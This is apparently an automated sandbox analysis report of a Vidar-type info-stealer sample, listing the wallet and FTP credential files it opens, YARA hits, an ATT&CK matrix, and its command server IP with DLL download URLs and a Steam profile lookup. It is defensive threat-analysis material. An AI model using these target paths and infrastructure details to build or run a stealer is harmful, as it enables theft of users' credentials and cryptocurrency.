                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Spice.pifBinary or memory string: WIN_81
                Source: Spice.pifBinary or memory string: WIN_XP
                Source: Spice.pifBinary or memory string: WIN_XPe
                Source: Spice.pifBinary or memory string: WIN_VISTA
                Source: Spice.pifBinary or memory string: WIN_7
                Source: Spice.pifBinary or memory string: WIN_8
                Source: Spice.pif.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: Process Memory Space: Spice.pif PID: 752, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 11.2.Spice.pif.4810000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Spice.pif PID: 752, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EE696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_00EE696E
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EE6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00EE6E32
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                11
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol4
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts
                2
                Obfuscated Files or Information
                Security Account Manager3
                File and Directory Discovery
                SMB/Windows Admin Shares21
                Input Capture
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                Software Packing
                NTDS26
                System Information Discovery
                Distributed Component Object Model3
                Clipboard Data
                114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading
                Cached Domain Credentials4
                Process Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                System Owner/User Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                Process Injection
                /etc/passwd and /etc/shadow1
                Remote System Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1433839 Sample: 0dN59ZIkEM.exe Startdate: 30/04/2024 Architecture: WINDOWS Score: 100 35 steamcommunity.com 2->35 37 ihIVTwGgMFMSkvPLDBTLteOUVB.ihIVTwGgMFMSkvPLDBTLteOUVB 2->37 53 Multi AV Scanner detection for domain / URL 2->53 55 Found malware configuration 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 6 other signatures 2->59 8 0dN59ZIkEM.exe 22 2->8         started        signatures3 process4 process5 10 cmd.exe 2 8->10         started        file6 25 C:\Users\user\AppData\Local\...\Spice.pif, PE32 10->25 dropped 61 Uses ping.exe to sleep 10->61 63 Drops PE files with a suspicious file extension 10->63 65 Uses ping.exe to check the status of other devices and networks 10->65 14 Spice.pif 39 10->14         started        19 PING.EXE 1 10->19         started        21 cmd.exe 2 10->21         started        23 7 other processes 10->23 signatures7 process8 dnsIp9 39 37.27.87.155, 443, 49710, 49711 UNINETAZ Iran (ISLAMIC Republic Of) 14->39 41 steamcommunity.com 23.7.115.52, 443, 49709 TelmexColombiaSACO United States 14->41 27 C:\Users\user\AppData\Local\...\sqln[1].dll, PE32 14->27 dropped 29 C:\Users\user\AppData\...\softokn3[1].dll, PE32 14->29 dropped 31 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 14->31 dropped 33 10 other files (6 malicious) 14->33 dropped 45 Detected unpacking (creates a PE file in dynamic memory) 14->45 47 Machine Learning detection for dropped file 14->47 49 Found many strings related to Crypto-Wallets (likely being stolen) 14->49 51 4 other signatures 14->51 43 127.0.0.1 unknown unknown 19->43 file10 signatures11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                0dN59ZIkEM.exe47%ReversingLabsWin32.Spyware.Vidar
                0dN59ZIkEM.exe42%VirustotalBrowse
                0dN59ZIkEM.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif100%Joe Sandbox ML
                C:\ProgramData\HCAEGCBFHJDG\freebl3.dll0%ReversingLabs
                C:\ProgramData\HCAEGCBFHJDG\freebl3.dll0%VirustotalBrowse
                C:\ProgramData\HCAEGCBFHJDG\mozglue.dll0%ReversingLabs
                C:\ProgramData\HCAEGCBFHJDG\mozglue.dll0%VirustotalBrowse
                C:\ProgramData\HCAEGCBFHJDG\msvcp140.dll0%ReversingLabs
                C:\ProgramData\HCAEGCBFHJDG\msvcp140.dll0%VirustotalBrowse
                C:\ProgramData\HCAEGCBFHJDG\nss3.dll0%ReversingLabs
                C:\ProgramData\HCAEGCBFHJDG\nss3.dll0%VirustotalBrowse
                C:\ProgramData\HCAEGCBFHJDG\softokn3.dll0%ReversingLabs
                C:\ProgramData\HCAEGCBFHJDG\softokn3.dll0%VirustotalBrowse
                C:\ProgramData\HCAEGCBFHJDG\vcruntime140.dll0%ReversingLabs
                C:\ProgramData\HCAEGCBFHJDG\vcruntime140.dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif7%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif3%VirustotalBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll0%VirustotalBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://mozilla.org0/0%URL Reputationsafe
                https://37.27.87.155/sqln.dll0%Avira URL Cloudsafe
                https://37.27.87.155/GHDGDAKECAKJEHCGDAA0%Avira URL Cloudsafe
                https://www.gstatic.cn/recaptcha/0%Avira URL Cloudsafe
                https://37.27.87.155ta0%Avira URL Cloudsafe
                https://37.27.87.155/ramData0%Avira URL Cloudsafe
                https://recaptcha.net0%URL Reputationsafe
                https://37.27.87.155/nss3.dll0%Avira URL Cloudsafe
                https://37.27.87.155/softokn3.dll0%Avira URL Cloudsafe
                https://37.27.87.155/sqln.dll12%VirustotalBrowse
                https://www.gstatic.cn/recaptcha/0%VirustotalBrowse
                https://37.27.87.155/vcruntime140.dll0%Avira URL Cloudsafe
                https://37.27.87.155HDHIDGIEBGIJEHIJKFIIition:0%Avira URL Cloudsafe
                https://37.27.87.155AAKKE0%Avira URL Cloudsafe
                https://37.27.87.155VWXYZ12345678900)0%Avira URL Cloudsafe
                https://37.27.87.155/msvcp140.dll0%Avira URL Cloudsafe
                https://37.27.87.155/0%Avira URL Cloudsafe
                https://37.27.87.155/freebl3.dll0%Avira URL Cloudsafe
                https://37.27.87.155/;0%Avira URL Cloudsafe
                https://37.27.87.155/freebl3.dll(e0%Avira URL Cloudsafe
                https://37.27.87.155CAKJE0%Avira URL Cloudsafe
                https://37.27.87.155/o0%Avira URL Cloudsafe
                https://37.27.87.155/11%VirustotalBrowse
                https://37.27.87.155/p0%Avira URL Cloudsafe
                https://37.27.87.155KKKEH0%Avira URL Cloudsafe
                https://37.27.87.1550%Avira URL Cloudsafe
                https://37.27.87.155/mozglue.dll0%Avira URL Cloudsafe
                https://37.27.87.155FBGIIIEBGDGDAKJKKKEBition:0%Avira URL Cloudsafe
                https://37.27.87.15511%VirustotalBrowse
                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                23.7.115.52
                truefalse
                  high
                  ihIVTwGgMFMSkvPLDBTLteOUVB.ihIVTwGgMFMSkvPLDBTLteOUVB
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://37.27.87.155/sqln.dllfalse
                    • 12%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://37.27.87.155/softokn3.dllfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://37.27.87.155/nss3.dllfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://37.27.87.155/vcruntime140.dllfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://37.27.87.155/msvcp140.dllfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://steamcommunity.com/profiles/76561199677575543false
                      high
                      https://37.27.87.155/false
                      • 11%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://37.27.87.155/freebl3.dllfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://37.27.87.155/mozglue.dllfalse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabDGDAEHCB.11.drfalse
                        high
                        https://duckduckgo.com/ac/?q=DGDAEHCB.11.drfalse
                          high
                          https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jSpice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmpfalse
                            high
                            https://37.27.87.155taSpice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            https://steamcommunity.com/?subsection=broadcastsSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                              high
                              https://steamcommunity.com/profiles/76561199677575543/badgesSpice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                high
                                https://store.steampowered.com/subscriber_agreement/Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                  high
                                  https://www.gstatic.cn/recaptcha/Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.autoitscript.com/autoit3/0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drfalse
                                    high
                                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engliSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                      high
                                      https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                        high
                                        https://37.27.87.155/GHDGDAKECAKJEHCGDAASpice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpESpice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                          high
                                          https://37.27.87.155/ramDataSpice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.valvesoftware.com/legal.htmSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                            high
                                            https://steamcommunity.com/profiles/76561199677575543/inventory/Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                              high
                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                high
                                                https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                  high
                                                  https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                    high
                                                    http://www.autoitscript.com/autoit3/J0dN59ZIkEM.exe, 00000000.00000003.1354277819.000000000282B000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000000.1408696187.0000000000F39000.00000002.00000001.01000000.00000005.sdmp, Factor.0.dr, Spice.pif.2.drfalse
                                                      high
                                                      https://steamcommunity.com/oSpice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.mozilla.com/en-US/blocklist/mozglue[1].dll.11.dr, mozglue.dll.11.drfalse
                                                          high
                                                          https://mozilla.org0/softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                            high
                                                            http://store.steampowered.com/privacy_agreement/Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                              high
                                                              https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                high
                                                                https://store.steampowered.com/points/shop/Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                  high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=DGDAEHCB.11.drfalse
                                                                    high
                                                                    https://37.27.87.155HDHIDGIEBGIJEHIJKFIIition:Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    low
                                                                    https://37.27.87.155AAKKESpice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    low
                                                                    https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://nsis.sf.net/NSIS_ErrorError0dN59ZIkEM.exefalse
                                                                        high
                                                                        https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                          high
                                                                          https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                            high
                                                                            https://www.ecosia.org/newtab/DGDAEHCB.11.drfalse
                                                                              high
                                                                              https://store.steampowered.com/privacy_agreement/Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                high
                                                                                https://37.27.87.155VWXYZ12345678900)Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                low
                                                                                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                  high
                                                                                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                    high
                                                                                    https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                      high
                                                                                      https://www.google.com/recaptcha/Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=c4UnSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                          high
                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                            high
                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                              high
                                                                                              https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=3gW5J8_jG_Yc&ampSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                high
                                                                                                https://store.steampowered.com/about/76561199677575543[1].htm.11.drfalse
                                                                                                  high
